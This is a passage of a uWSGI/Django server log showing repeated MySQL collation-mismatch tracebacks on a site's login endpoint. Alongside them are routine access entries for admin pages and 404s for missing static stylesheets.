"/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 95/148] 219.228.146.146 () {48 vars in 970 bytes} [Thu Jan 14 07:44:30 2021] POST /login/ => generated 183444 bytes in 86 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 96/149] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:33 2021] POST /login/ => generated 183350 bytes in 145 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 97/150] 219.228.146.146 () {40 vars in 892 bytes} [Thu Jan 14 07:44:34 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /login/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 233, in login + if len(models.User.objects.filter(uid=uid, password=pwd)) != 0: + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 269, in __len__ + self._fetch_all() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1308, in _fetch_all + self._result_cache = list(self._iterable_class(self)) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 53, in __iter__ + results = compiler.execute_sql(chunked_fetch=self.chunked_fetch, chunk_size=self.chunk_size) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1156, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.OperationalError: (1267, "Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,COERCIBLE) for operation '='") +[pid: 2069|app: 0|req: 98/151] 219.228.146.253 () {48 vars in 966 bytes} [Thu Jan 14 07:44:34 2021] POST /login/ => generated 183350 bytes in 123 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 99/152] 219.228.146.253 () {40 vars in 875 bytes} [Thu Jan 14 07:44:44 2021] GET /my-admin => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 178 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 100/153] 219.228.146.146 () {48 vars in 978 bytes} [Thu Jan 14 07:44:45 2021] POST /my-admin/ => generated 27 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 101/154] 219.228.146.146 () {40 vars in 899 bytes} [Thu Jan 14 07:44:45 2021] GET /admin-home/ => generated 6515 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 102/155] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 103/156] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 104/157] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 105/158] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 106/159] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:44:45 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 107/160] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 17 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 108/161] 219.228.146.146 () {38 vars in 778 bytes} [Thu Jan 14 07:44:45 2021] GET /static/css/animate.css => generated 3513 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 109/162] 219.228.146.146 () {38 vars in 848 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 110/163] 219.228.146.146 () {38 vars in 812 bytes} [Thu Jan 14 07:44:45 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 111/164] 219.228.146.253 () {40 vars in 875 bytes} [Thu Jan 14 07:44:46 2021] GET /my-admin/ => generated 5366 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 112/165] 219.228.146.146 () {40 vars in 900 bytes} [Thu Jan 14 07:44:47 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 113/166] 219.228.146.146 () {40 vars in 902 bytes} [Thu Jan 14 07:44:47 2021] GET /kind-manage/ => generated 6423 bytes in 8 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 114/167] 219.228.146.146 () {38 vars in 845 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 115/168] 219.228.146.146 () {38 vars in 849 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 116/169] 219.228.146.146 () {38 vars in 857 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 117/170] 219.228.146.146 () {38 vars in 813 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 118/171] 219.228.146.146 () {38 vars in 779 bytes} [Thu Jan 14 07:44:48 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 119/172] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 21 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 120/173] 219.228.146.146 () {38 vars in 833 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 121/174] 219.228.146.146 () {38 vars in 889 bytes} [Thu Jan 14 07:44:48 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 122/175] 219.228.146.146 () {38 vars in 781 bytes} [Thu Jan 14 07:44:48 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.253 client_port: 62153] hr_write(): Broken pipe [plugins/http/http.c line 565] +[uwsgi-http key: 188.131.132.108:8000 client_addr: 219.228.146.253 client_port: 62409] hr_write(): Broken pipe [plugins/http/http.c line 565] +[pid: 2069|app: 0|req: 123/176] 219.228.146.253 () {48 vars in 973 bytes} [Thu Jan 14 07:45:13 2021] POST /my-admin/ => generated 27 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 124/177] 219.228.146.253 () {40 vars in 925 bytes} [Thu Jan 14 07:45:13 2021] GET /admin-home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 180 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 125/178] 219.228.146.253 () {40 vars in 927 bytes} [Thu Jan 14 07:45:13 2021] GET /admin-home/ => generated 6515 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 2069|app: -1|req: -1/179] 219.228.146.253 () {38 vars in 872 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/bootstrap/css/bootstrap.min.css => generated 150996 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/180] 219.228.146.253 () {38 vars in 806 bytes} [Thu Jan 14 07:45:14 2021] GET /static/css/style.css => generated 118751 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 89 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/181] 219.228.146.253 () {38 vars in 818 bytes} [Thu Jan 14 07:45:14 2021] GET /static/css/colors/blue.css => generated 3905 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/182] 219.228.146.253 () {38 vars in 835 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/jquery/jquery.min.js => generated 86596 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/183] 219.228.146.253 () {38 vars in 847 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/bootstrap/js/tether.min.js => generated 24900 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/184] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:45:14 2021] GET /static/assets/plugins/bootstrap/js/bootstrap.min.js => generated 46653 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/185] 219.228.146.253 () {38 vars in 811 bytes} [Thu Jan 14 07:45:14 2021] GET /static/js/jquery.slimscroll.js => generated 4475 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/186] 219.228.146.253 () {38 vars in 787 bytes} [Thu Jan 14 07:45:15 2021] GET /static/js/waves.js => generated 4237 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/187] 219.228.146.253 () {38 vars in 799 bytes} [Thu Jan 14 07:45:15 2021] GET /static/js/sidebarmenu.js => generated 10298 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/188] 219.228.146.253 () {38 vars in 875 bytes} [Thu Jan 14 07:45:15 2021] GET /static/assets/plugins/sticky-kit-master/dist/sticky-kit.min.js => generated 3268 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/189] 219.228.146.253 () {38 vars in 797 bytes} [Thu Jan 14 07:45:15 2021] GET /static/js/custom.min.js => generated 1436 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 2069|app: -1|req: -1/190] 219.228.146.253 () {38 vars in 871 bytes} [Thu Jan 14 07:45:16 2021] GET /static/assets/plugins/styleswitcher/jQuery.style.switcher.js => generated 1433 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 126/191] 219.228.146.253 () {38 vars in 885 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 127/192] 219.228.146.253 () {38 vars in 897 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 128/193] 219.228.146.253 () {38 vars in 889 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 129/194] 219.228.146.253 () {38 vars in 853 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 130/195] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 131/196] 219.228.146.253 () {38 vars in 873 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 132/197] 219.228.146.253 () {38 vars in 929 bytes} [Thu Jan 14 07:45:17 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 133/198] 219.228.146.253 () {38 vars in 821 bytes} [Thu Jan 14 07:45:17 2021] GET /static/css/spinners.css => generated 3516 bytes in 11 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 134/199] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:45:17 2021] GET /static/css/animate.css => generated 3513 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 135/200] 219.228.146.253 () {40 vars in 930 bytes} [Thu Jan 14 07:45:23 2021] GET /admin-home/ => generated 6515 